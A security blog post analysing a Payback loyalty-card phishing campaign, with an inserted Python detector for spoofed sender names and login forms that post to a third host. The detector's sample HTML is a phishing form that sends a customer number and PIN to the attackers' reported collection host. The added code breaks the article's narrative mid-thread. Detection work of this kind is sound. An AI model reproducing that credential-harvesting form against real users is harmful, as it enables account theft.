There has been a lot of discussion about couponing and loyalty cards such as Payback. Some find the practice of having their shopping habits analyzed disagreeable; others simply hunt for points and redeem them for rewards. Now, a few weeks before Christmas, G DATA has uncovered a spam campaign that can end up costing you more than your virtual points or coupons: your personal data.
On its website, Payback admits that the emails from the current spam campaign "are well-made, unfortunately". We fully agree. A glance at the sender name could easily fool the reader, because it looks legitimate: it reads "Payback.de Service". Genuine messages from Payback, however, only ever use "Payback Service" as the sender name. You can find more details on this in the section "Fraud Attempt Indicators". Furthermore, the recipient is addressed correctly: the name matches the real account data, as does the email address shown under "Your Payback Account". Save for a few exceptions, the email looks identical to genuine messages from Payback. There are very few indicators that something is not quite right, and they are hard to spot:
The two emails direct the reader to two different websites. We admit that the domains are well chosen for the purpose as it is easy to glance over them without suspecting anything:
At the time of the analysis, both domains were hosted on the same server at BlazingFast LLC, a hosting provider in Ukraine. Both websites are exact lookalikes of the genuine Payback website.
The only difference is the submission form for the login data. Anything entered there is not sent to Payback but to a server controlled by the attackers: www. loginpage .online
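The two things that give this campaign away are exactly the two things a checker can look for: a sender display name that smuggles in a domain-like token ("Payback.de") while the real sender address lives somewhere else, and a login form on a pixel-perfect copy of the site whose action points at a third host. The following Python is an added example written for this article, not code from G DATA or Payback; the email header and the HTML page it parses are constructed for illustration, and the lookalike hostname `www.example-lookalike.test` and the brand domain `payback.de` are assumptions (the page does not name the lookalike domains). The collection host `www.loginpage.online` is the one the article reports.

```python
"""Two checks for the phishing pattern described above:
 1. a From: display name that looks like a domain but does not match the
    sender address domain ("Payback.de Service" <...@some-other-host>), and
 2. a page whose credential form posts to a host other than the one
    serving the page (lookalike site, attacker-controlled form action).
Added example; all sample data below is constructed."""
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

LEGIT_DOMAIN = "payback.de"  # assumption: the brand's real sending domain


def suspicious_sender(from_header: str, legit_domain: str = LEGIT_DOMAIN) -> list:
    """Return a list of reasons the From: header looks spoofed (empty = clean)."""
    name, addr = parseaddr(from_header)
    addr_domain = addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""
    reasons = []
    if addr_domain != legit_domain and not addr_domain.endswith("." + legit_domain):
        reasons.append(f"sender domain {addr_domain!r} is not {legit_domain!r}")
    # A domain-like token in the display name ("Payback.de") makes the brand's
    # domain appear in the inbox listing even though the mail comes from elsewhere.
    for token in name.split():
        t = token.lower().strip(".,;:")
        if "." in t and t != addr_domain:
            reasons.append(f"display name carries domain-like token {token!r} "
                           f"but the mail comes from {addr_domain!r}")
    return reasons


class _FormCollector(HTMLParser):
    """Collect every <form> with its action and the (type, name) of its inputs."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append(((a.get("type") or "text").lower(),
                                            a.get("name") or ""))

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def offsite_credential_forms(page_url: str, html: str) -> list:
    """Return (target_host, field_names) for each form that contains a password
    field and whose action resolves to a host other than the page's own host.
    Scheme-relative and relative actions are resolved against page_url first,
    so "//evil.example/x" and "/login" are judged by where they really go."""
    parser = _FormCollector()
    parser.feed(html)
    page_host = urlparse(page_url).hostname or ""
    findings = []
    for form in parser.forms:
        if not any(t == "password" for t, _ in form["inputs"]):
            continue
        target_host = urlparse(urljoin(page_url, form["action"])).hostname or ""
        if target_host != page_host:
            findings.append((target_host, [n for _, n in form["inputs"] if n]))
    return findings


# Constructed samples (not real campaign artefacts).
SAMPLE_FROM = '"Payback.de Service" <service@mail.example-lookalike.test>'
SAMPLE_PAGE_URL = "https://www.example-lookalike.test/login"
SAMPLE_HTML = """
<html><body>
<form action="https://www.example-lookalike.test/search" method="get">
  <input type="text" name="q">
</form>
<form action="//www.loginpage.online/collect.php" method="post">
  <input type="text" name="kundennummer">
  <input type="password" name="pin">
  <input type="hidden" name="_csrf" value="x">
  <input type="submit" value="Login">
</form>
</body></html>
"""

if __name__ == "__main__":
    for reason in suspicious_sender(SAMPLE_FROM):
        print("sender:", reason)
    for host, fields in offsite_credential_forms(SAMPLE_PAGE_URL, SAMPLE_HTML):
        print(f"credential form posts to {host}, fields {fields}")
```

The form check deliberately ignores forms without a password field (site search, newsletter boxes) so that a legitimate site with a few off-host helper forms does not drown the one finding that matters. Run against a saved copy of the page it reports the collection host and the field names the attackers harvest, which is the same information a takedown request or a block-list entry needs.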
This domain is hosted in the USA, and its registration details are hidden. The dedicated server is likewise associated with BlazingFast LLC. A quick search with popular search engines shows that the company does not have an entirely clean record. One may suspect that the attackers are running their phishing pages on hacked web servers: the first domain we mentioned actually hosts the website of a Brazilian vendor of air-conditioning units, and that web presence has been abused before and is known for its connection with other phishing attacks (e.g. against customers of a Brazilian bank).
Initially, one might be tempted to shrug this off: after all, they are just virtual points, so nothing is really lost if something happens to them. That would be bad advice, because behind this seemingly insignificant account is real personal information, which can be turned into money.